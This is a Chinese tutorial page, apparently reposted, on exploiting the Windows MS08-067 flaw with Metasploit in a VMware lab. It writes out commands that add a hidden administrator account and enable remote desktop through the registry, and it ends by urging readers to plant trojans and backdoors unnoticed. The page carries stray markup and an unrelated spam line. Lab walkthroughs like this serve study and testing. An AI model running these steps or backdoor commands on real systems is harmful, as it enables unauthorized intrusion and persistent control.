<dd id="yzu3f"><tr id="yzu3f"><kbd id="yzu3f"></kbd></tr></dd>

              安基網 首頁 安全 滲透測試 查看內容

              怎樣利用Ms08-067漏洞進行攻擊?

              2019-2-26 15:36| 投稿: xiaotiger |來自: 互聯網


              免責聲明:本站系公益性非盈利IT技術普及網,本文由投稿者轉載自互聯網的公開文章,文末均已注明出處,其內容和圖片版權歸原網站或作者所有,文中所述不代表本站觀點,若有無意侵權或轉載不當之處請從網站右下角聯系我們處理,謝謝合作!

              摘要: Ms08-067是微軟上的一個漏洞,全稱為“Windows Server服務RPC請求緩沖區溢出漏洞”。廣泛存在于Windows 2000/XP/Server 2003/Vista/Server 2008的各個版本!但是這個漏洞很老了,微軟早就給出了解決方案,大家也都已 ...

              hello大家好,我是摩西!

              Ms08-067是微軟上的一個漏洞,全稱為“Windows Server服務RPC請求緩沖區溢出漏洞”。廣泛存在于Windows 2000/XP/Server 2003/Vista/Server 2008的各個版本!

              但是這個漏洞很老了,微軟早就給出了解決方案,大家也都已經打好了補丁。今天帶領大家看看,如果沒有打好補丁,我們如何利用這個漏洞對一臺電腦進行攻擊?

              攻擊環境準備

              前提:靶子機有Ms08-067漏洞,攻擊機有metasploit工具。工具:VMware平臺,kali虛擬機(建議安裝英文版)。Metasploit是一款開源安全漏洞檢測工具,附帶數百個已知的軟件漏洞,并保持頻繁更新,重要的是,kali自帶這個工具!

              第一步:利用漏洞進入靶子機shell界面

              首先當然是啟動kali和有漏洞的系統。

              分別查看kali和目標機器的IP,因為我們是在虛擬機里面演示,為確保正確,兩個機子需要測試連通性。我的kali:192.168.61.129。目標靶機:192.168.61.130。kali ping 目標靶機,連通性沒有問題!

              連通性沒有問題那我們就開始滲透了,在kali在命令行輸入msfconsole,稍等片刻,啟動metasploit工具。

              輸入命令:search ms08-067查找ms08-067漏洞,并利用該漏洞!

              使用show options 命令查看需要的配置,然后配置RHOST(靶子機IP 地址),LHOST(本機 IP 地址),LPORT(本地端口),因為該漏洞利 用的是445端口,所以RPORT(靶子機端口)不用配置。本地端口不配置也行,系統會自行分配一個端口。

              配置完成后,使用search windows/mete命令(模糊查詢)查詢 payload。查詢出來之后選擇一個payload進行攻擊。我們選擇圖中這個。

              全部順利設置完成之后,輸入 exploit 命令:即可利用該漏洞建立會話,會話建立成功后, 輸入shell命令即可進入靶子機命令行 。

              到這里,我們已經是黑進了這個系統,可以做我們想做的了,但是,不是全部,因為我們的權限不是最高的,要想得到最高權限,接下來就得提權了!

              第二步:創建用戶并提權

              輸入命令net user kali kali123 /add,創建用戶kali ,密碼為 kali123 (用戶和密碼可自由填寫, 注密碼必須是字母加數字) 。因為我已經創建過了,所以提示用戶已存在!

              將root用戶添加到管理員組 ,輸入命令net localgroup administrators kali /add。

              由于 kali 中文版顯示為亂碼(建議安裝英文版),所以直接在靶子 機上查看是否提權成功 !在靶機命令行直接輸入net localgroup administrators就可以查看。如果有kali,說明提權成功!

              第三步:開啟遠程桌面:開啟3389端口

              在shell下輸入以下命令 REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal " "Server /v fDenyTSConnections /t REG_DWORD /d 0000000 0 /f

              輸入netstat –an 查看是否開啟成功

              使得目標靶機開啟3389端口之后,我們就能遠程登陸靶機了,新開一個終端輸入rdesktop -f -a 16 IP:3389(IP為靶子機地 址),Rdesktop在kali下是默認安裝的,如果沒有安裝,在終端輸入命 令apt-get install rdesktop 進行安裝。

              通過遠程登陸靶機之后,就可以干你想干的事了,上傳木馬啊,留后門啊,鎖文件啊,之類的。之后的就憑自己想象了!關鍵是,這都是在靶機不知不覺中進行的!

              好了,本次演示就到這了,感謝各位看官,歡迎指出問題!喜歡可以關注,關注不迷路!文章持續更新哦!



              小編推薦:欲學習電腦技術、系統維護、網絡管理、編程開發和安全攻防等高端IT技術,請 點擊這里 注冊賬號,公開課頻道價值萬元IT培訓教程免費學,讓您少走彎路、事半功倍,好工作升職加薪!

              本文出自:https://www.toutiao.com/a6661948070688719371/

              免責聲明:本站系公益性非盈利IT技術普及網,本文由投稿者轉載自互聯網的公開文章,文末均已注明出處,其內容和圖片版權歸原網站或作者所有,文中所述不代表本站觀點,若有無意侵權或轉載不當之處請從網站右下角聯系我們處理,謝謝合作!


              鮮花

              握手

              雷人

              路過

              雞蛋

              相關閱讀

              最新評論

               最新
              返回頂部
              十一选五奖金对照表